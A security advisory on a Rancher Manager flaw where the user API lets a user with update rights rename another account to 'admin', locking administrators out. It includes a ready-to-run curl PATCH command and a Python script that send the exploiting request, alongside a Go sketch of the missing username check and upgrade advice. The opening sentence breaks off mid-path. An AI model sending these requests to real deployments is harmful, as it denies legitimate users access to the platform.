The vulnerability stems from a missing server-side validation check on the `username` field within the Rancher Manager’s user API. In unpatched versions, the API endpoint responsible for updating User resources does not enforce immutability on an existing username. A user with `update` permissions on another user’s resource can send a PUT/PATCH request to the `/v3/users/
Platform: Rancher Manager
Version: < v2.12.2, < v2.11.6, < v2.10.10, < v2.9.12
Vulnerability: Improper Access Control
Severity: Medium
Date: 2023
Prediction: Patch available.
What Undercode Says:
```bash
# $TOKEN, rancher.local and u-xxxxx are placeholders for the caller's API token,
# the Rancher host and the target user id; the body carries the username change
# that unpatched versions accept.
curl -X PATCH -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"username":"admin"}' https://rancher.local/v3/users/u-xxxxx
```

Simulates the flawed update request:

```python
import requests

# <attacker_token> and <target_user_id> are placeholders for the caller's
# token and the id of the User resource being modified.
headers = {'Authorization': 'Bearer <attacker_token>'}
payload = {"username": "admin"}
response = requests.patch('https://rancher/v3/users/<target_user_id>', json=payload, headers=headers)
# Unpatched versions answer with a success status; patched versions reject the change.
print(response.status_code)
```
How It Is Exploited:
Attacker with user update permissions modifies a target user’s username to “admin” via the API, causing a login collision and denial of access.
Protection from this CVE:
Upgrade to patched versions. Restrict user update permissions to essential, trusted administrators only.
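The server-side check whose absence the advisory describes, shown as an added illustration rather than Rancher's own code: the `User` type, the two merge helpers and the constructed record are assumptions for this example, with the unpatched merge placed beside the one that enforces username immutability.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// User is a simplified stand-in for a Rancher v3 User resource (assumed shape).
type User struct {
	ID       string `json:"id"`
	Username string `json:"username"`
	Name     string `json:"name"`
}
var ErrUsernameImmutable = errors.New("username is immutable once set")

// ApplyUserPatchUnchecked mirrors the unpatched behaviour the advisory
// describes: every field in the body, username included, is merged as-is.
func ApplyUserPatchUnchecked(existing User, patchBody []byte) (User, error) {
	updated := existing
	err := json.Unmarshal(patchBody, &updated)
	return updated, err
}

// ApplyUserPatch adds the missing server-side check: a PATCH may repeat the
// current username but may not change it. Other fields merge normally.
func ApplyUserPatch(existing User, patchBody []byte) (User, error) {
	var probe struct {
		Username *string `json:"username"`
	}
	if err := json.Unmarshal(patchBody, &probe); err != nil {
		return existing, fmt.Errorf("invalid patch body: %w", err)
	}
	// Reject rather than silently drop the field, so the caller gets an
	// error response and the attempt is visible in the audit log.
	if probe.Username != nil && *probe.Username != existing.Username {
		return existing, ErrUsernameImmutable
	}
	updated := existing
	if err := json.Unmarshal(patchBody, &updated); err != nil {
		return existing, err
	}
	return updated, nil
}

func main() {
	u := User{ID: "u-abc12", Username: "alice", Name: "Alice"} // constructed record
	_, err := ApplyUserPatch(u, []byte(`{"username":"admin"}`))
	fmt.Println("rename to admin rejected:", errors.Is(err, ErrUsernameImmutable))
}
```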
Impact:
Administrative account lockout, denial of service for targeted users, disruption of platform management.
Sources:
Reported By: github.com